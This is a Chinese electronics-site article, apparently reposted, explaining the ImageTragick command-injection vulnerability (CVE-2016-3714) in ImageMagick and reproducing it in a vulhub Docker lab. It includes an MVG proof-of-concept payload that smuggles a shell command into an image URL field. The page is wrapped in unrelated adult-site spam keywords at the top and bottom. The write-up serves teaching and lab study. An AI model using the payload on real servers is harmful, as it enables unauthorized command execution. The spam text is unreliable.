在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

一款使用量很廣的圖片處理程序ImageMagick

Android編程精選 ? 來(lái)源:小白學(xué)黑客 ? 作者:小白哥 ? 2022-08-16 10:18 ? 次閱讀

大家好,我是小白哥。

這兩天,關(guān)于QQ盜號(hào)的安全事件相信大家已經(jīng)聽(tīng)說(shuō)了。各種各樣的傳言都有,一會(huì)兒數(shù)據(jù)庫(kù)泄露了,一會(huì)兒API漏洞了,一會(huì)兒又是協(xié)議漏洞了,還有的說(shuō)掃描二維碼中招的,一時(shí)間眾說(shuō)紛紜。

在眾多說(shuō)法中,我看到了一個(gè):只要點(diǎn)擊圖片就會(huì)中招!

好家伙,點(diǎn)圖片就能中招,這可厲害了,要是對(duì)方發(fā)來(lái)一些誘惑的圖片,年輕人把持不住那可咋整?

真有那么懸乎嗎?

這不禁讓我想起了幾年前的一個(gè)漏洞,也是圖片相關(guān)的,分享給大家看看。

那次漏洞的主角,是ImageMagick。

漏洞介紹

漏洞名稱(chēng):Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定級(jí):高危

漏洞描述:ImageMagick 在處理惡意構(gòu)造的圖片文件時(shí),對(duì)于文件中的 URL 未經(jīng)嚴(yán)格過(guò)濾,可導(dǎo)致命令注入漏洞。通過(guò)命令注入漏洞,黑客可以在服務(wù)器上執(zhí)行任意系統(tǒng)命令,獲取服務(wù)器權(quán)限。

影響范圍:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很廣的圖片處理程序,很多廠商都調(diào)用了這個(gè)程序進(jìn)行圖片處理,包括圖片的伸縮、切割、水印、格式轉(zhuǎn)換等等。

但有研究者發(fā)現(xiàn),當(dāng)用戶(hù)傳入一個(gè)包含『畸形內(nèi)容』的圖片的時(shí)候,就有可能觸發(fā)命令注入漏洞。

國(guó)外的安全人員為此新建了一個(gè)網(wǎng)站:https://imagetragick.com/

與這個(gè)漏洞相關(guān)的CVE有CVE-2016-3714CVE-2016-3715CVE-2016-3716CVE-2016-3717

其中最嚴(yán)重的就是CVE-2016-3714,利用這個(gè)漏洞可以造成遠(yuǎn)程命令執(zhí)行的危害。

ImageMagick有一個(gè)功能叫做delegate(委托),作用是調(diào)用外部的lib來(lái)處理文件。而調(diào)用外部lib的過(guò)程是使用系統(tǒng)的system命令來(lái)執(zhí)行的

參考代碼:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我們?cè)贗mageMagick的默認(rèn)配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml漏洞報(bào)告中給出的POC是利用了如下的這個(gè)委托:

"https"command=""curl"-s-k-o"%o""https:%M""/>

它在解析https圖片的時(shí)候,使用了curl命令將其下載,我們看到%M被直接放在curl的最后一個(gè)參數(shù)內(nèi)。

ImageMagick默認(rèn)支持一種圖片格式,叫mvg,而mvg與svg格式類(lèi)似,其中是以文本形式寫(xiě)入矢量圖的內(nèi)容,而這其中就可以包含https處理過(guò)程。

所以我們可以構(gòu)造一個(gè).mvg格式的圖片(但文件名可以不為.mvg,比如下圖中包含payload的文件的文件名為vul.gif,而ImageMagick會(huì)根據(jù)其內(nèi)容識(shí)別為mvg圖片),并在https://后面閉合雙引號(hào),寫(xiě)入自己要執(zhí)行的命令:

pushgraphic-context
viewbox00640480
fill‘url(https://"|id;")’
popgraphic-context

這樣,ImageMagick在正常執(zhí)行圖片轉(zhuǎn)換、處理的時(shí)候就會(huì)觸發(fā)漏洞。

漏洞復(fù)現(xiàn)

  • 搭建靶機(jī),教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
  • 下載vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
  • 進(jìn)入目錄:cd /vulhub-master/imagemagick/imagetragick
  • 啟動(dòng)docker:docker-compose up -d 注意 我靶機(jī) docker-compose.yml中端口為8888
6c4e0e0c-1cf7-11ed-ba43-dac502259ad0.png
  • 訪問(wèn)搭建的靶機(jī)ip:8888
6c62c91e-1cf7-11ed-ba43-dac502259ad0.png
  • 上傳poc,新建一個(gè)txt文件,內(nèi)容為:
pushgraphic-context
viewbox00640480
fill'url(https://"|id;")'
popgraphic-context

將文件保存為poc.gif

6c79b7a0-1cf7-11ed-ba43-dac502259ad0.png

上次poc.gif,點(diǎn)擊提交,成功執(zhí)行:

6c91dbf0-1cf7-11ed-ba43-dac502259ad0.png

這年頭,除了鏈接,圖片也不敢隨便亂點(diǎn)了···

————————————————

漏洞原理和復(fù)現(xiàn)部分原文鏈接:https://blog.csdn.net/u011975363/article/details/118031227

審核編輯 :李倩


聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 數(shù)據(jù)庫(kù)
    +關(guān)注

    關(guān)注

    7

    文章

    3901

    瀏覽量

    65785
  • 漏洞
    +關(guān)注

    關(guān)注

    0

    文章

    205

    瀏覽量

    15630
  • 圖片處理
    +關(guān)注

    關(guān)注

    0

    文章

    17

    瀏覽量

    7206

原文標(biāo)題:看圖片也能中招!

文章出處:【微信號(hào):AndroidPush,微信公眾號(hào):Android編程精選】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    CodeBuddy 打造一款響應(yīng)式圖片畫(huà)廊

    圖片畫(huà)廊頁(yè)面來(lái)作為練手項(xiàng)目,目標(biāo)很明確:要實(shí)現(xiàn)不等高的 Masonry 布局,點(diǎn)擊圖片能彈出大圖預(yù)覽,還要能通過(guò)鍵盤(pán)切換圖片。理想狀態(tài)下,它還應(yīng)該支持無(wú)限滾動(dòng)加載,并提供分類(lèi)篩選功能。光想想就覺(jué)得挺麻煩的,但我決定用 Code
    的頭像 發(fā)表于 05-11 13:33 ?195次閱讀
    CodeBuddy 打造<b class='flag-5'>一款</b>響應(yīng)式<b class='flag-5'>圖片</b>畫(huà)廊

    一款入耳式耳機(jī)的仿真與分析

    電子發(fā)燒友網(wǎng)站提供《一款入耳式耳機(jī)的仿真與分析.pdf》資料免費(fèi)下載
    發(fā)表于 04-22 15:39 ?3次下載

    請(qǐng)問(wèn)瑞芯微的soc芯片,有沒(méi)有尺寸小于10mm*10mm的? 找一款小尺寸的soc用于視頻處理

    請(qǐng)問(wèn)瑞芯微的soc芯片,有沒(méi)有尺寸小于10mm*10mm的? 找一款小尺寸的soc用于視頻處理
    發(fā)表于 03-28 11:47

    STM32H753IIT6 一款32位微控制器MCU/MSP430F5325IPNR一款16位MCU

    高效數(shù)據(jù)處理和低功耗管理的各種嵌入式系統(tǒng)中也有廣泛應(yīng)用。 明佳達(dá) STM32H753IIT6是一款基于高性能Arm Cortex-M7 32位RISC內(nèi)核的微控制器,工作頻率高達(dá)480 MHz?。該內(nèi)核
    發(fā)表于 02-21 14:59

    Spire.Cloud.Word云端Word文檔處理SDK介紹

    Spire.Cloud.Word 是一款專(zhuān)業(yè)的云端 Word 文檔處理 SDK,開(kāi)發(fā)人員使用它在云端創(chuàng)建、讀取、編輯、轉(zhuǎn)換和保存 Word 文檔。作為一款完全獨(dú)立的組件,運(yùn)行環(huán)境無(wú)需安裝
    的頭像 發(fā)表于 02-11 11:11 ?409次閱讀
    Spire.Cloud.Word云端Word文檔<b class='flag-5'>處理</b>SDK介紹

    使用Python+OpenCV處理圖片

    如果給你圖片作為背景,另外圖片中的物體作為前景圖,要把前景圖中的物體疊加布置到背景圖的中間位置,并且前景圖中的物體需要在背景圖中有旋轉(zhuǎn)和投影,怎么
    的頭像 發(fā)表于 12-23 15:54 ?717次閱讀

    求推薦一款處理24V的差分編碼器信號(hào)的芯片

    你好,我們先前用的是SN65LBC175AD處理5V的差分編碼器信號(hào),現(xiàn)在編碼器換成24V的,希望能推薦一款處理24V的差分編碼器信號(hào)的芯片,謝謝!
    發(fā)表于 12-18 06:52

    三星減少NAND生產(chǎn)光刻膠使用量

    近日,據(jù)相關(guān)報(bào)道,三星電子在3D NAND閃存生產(chǎn)領(lǐng)域取得了重要技術(shù)突破,成功大幅減少了光刻工藝中光刻膠的使用量。 據(jù)悉,三星已經(jīng)制定了未來(lái)NAND閃存的生產(chǎn)路線圖,并計(jì)劃在這生產(chǎn)過(guò)程中,將光刻膠
    的頭像 發(fā)表于 11-27 11:00 ?571次閱讀

    如果設(shè)計(jì)一款桌面的機(jī)器玩具,最吸引人的外觀與功能要有哪些?

    初步設(shè)想制作如下其中一款,有感興趣的朋友可以幫提提意見(jiàn)。 A一款圓敦敦的音響狀的“個(gè)人日程助手”,具備番茄鬧鐘、音樂(lè)播放、減壓交互、語(yǔ)言對(duì)話、工作日?qǐng)?bào)生成。 B一款迷你瓦利機(jī)器人,有
    發(fā)表于 10-19 18:25

    經(jīng)過(guò)TAS5548EVM評(píng)估板處理輸出的PWM信號(hào),可以用哪一款型號(hào)的數(shù)字功放評(píng)估板處理

    您好,我想了解下,經(jīng)過(guò)TAS5548EVM評(píng)估板處理輸出的PWM信號(hào),可以用哪一款型號(hào)的數(shù)字功放評(píng)估板處理?用TAS5631系列的板子處理
    發(fā)表于 10-18 07:13

    我想選一款音頻芯片,性能類(lèi)似TAS2505-Q1的,帶有音頻處理和D類(lèi)功放功能二合

    TI工程師你好!我想選一款音頻芯片,性能類(lèi)似TAS2505-Q1的,帶有音頻處理和D類(lèi)功放功能二合的,輸出功率是20~30W單路雙路輸出都可以,是否有這樣的芯片可選。謝謝!
    發(fā)表于 10-09 07:32

    基于ArkTS語(yǔ)言的OpenHarmony APP應(yīng)用開(kāi)發(fā):圖片處理

    1、程序介紹本案例使用TextArea實(shí)現(xiàn)多文本輸入,使用mediaLibrary實(shí)現(xiàn)在相冊(cè)中獲取圖片,使用image生成pixelMap,使用pixelMap的scale(),crop
    的頭像 發(fā)表于 09-20 08:07 ?1198次閱讀
    基于ArkTS語(yǔ)言的OpenHarmony APP應(yīng)用開(kāi)發(fā):<b class='flag-5'>圖片</b><b class='flag-5'>處理</b>

    選用一款運(yùn)放搭建單位增益運(yùn)算放大電路遇到的問(wèn)題求解

    當(dāng)選用一款運(yùn)放搭建單位增益運(yùn)算放大電路的時(shí)候,經(jīng)常遇到下面的問(wèn)題,不知道這個(gè)問(wèn)題的來(lái)源是什么? 輸入信號(hào): 這是正弦信號(hào)是比較理想的,波形不存在問(wèn)題。 輸出信號(hào)(下面的三幅圖片為依次放大后的情況): 可以看到,在輸出信號(hào)的波形中,存在細(xì)小的波紋。 那么,這種現(xiàn)實(shí)是
    發(fā)表于 08-22 06:32

    INA-138設(shè)計(jì)了一款電路,取樣后1腳的輸出不是個(gè)穩(wěn)定的電平,如何處理

    設(shè)計(jì)了一款電路,使用到INA-138 ,SOT-23封裝,取樣后1腳的輸出不是個(gè)穩(wěn)定的電平,如何處理
    發(fā)表于 08-12 06:51

    如何設(shè)計(jì)一款50HZ陷波電路?

    如何設(shè)計(jì)一款50HZ陷波電路,有現(xiàn)成的參考電路設(shè)計(jì)嗎
    發(fā)表于 07-30 06:12
    主站蜘蛛池模板: 另类图片综合网 | 成人欧美一区二区三区黑人免费 | 九九涩| 91久久国产青草亚洲 | 国产aa| 色视频免费国产观看 | 2019天天操夜夜操 | 特黄aaaaa日本大片免费看 | 国产成人mv在线观看入口视频 | 高清一级做a爱视频免费 | 天天靠天天擦天天摸 | 毛片站 | 久久免费观看国产精品 | 欧美三级手机在线 | 99久久免费精品视频 | 亚洲欧美视频在线播放 | 台湾一级毛片永久免费 | 天天射天天操天天干 | 亚洲综合色一区 | 日本免费黄网站 | 免费的色视频 | 五月天婷婷爱 | 欧美色爱综合 | 国产美女精品在线 | 色综合美国色农夫网 | 六月婷婷综合网 | yyy6080韩国三级理论 | 一本大道一卡二卡 | 中文字幕一区二区三区四区 | 婷婷久久综合网 | 欧美69视频在线 | 韩国三级理论在线观看视频 | 免费高清视频免费观看 | 欧美一级片手机在线观看 | 成人永久免费视频 | 狠狠色噜噜狠狠狠狠米奇777 | 久久久久久噜噜噜久久久精品 | 377p亚洲欧洲日本大胆色噜噜 | 天天噜天天干 | 香蕉视频黄色片 | h视频免费 |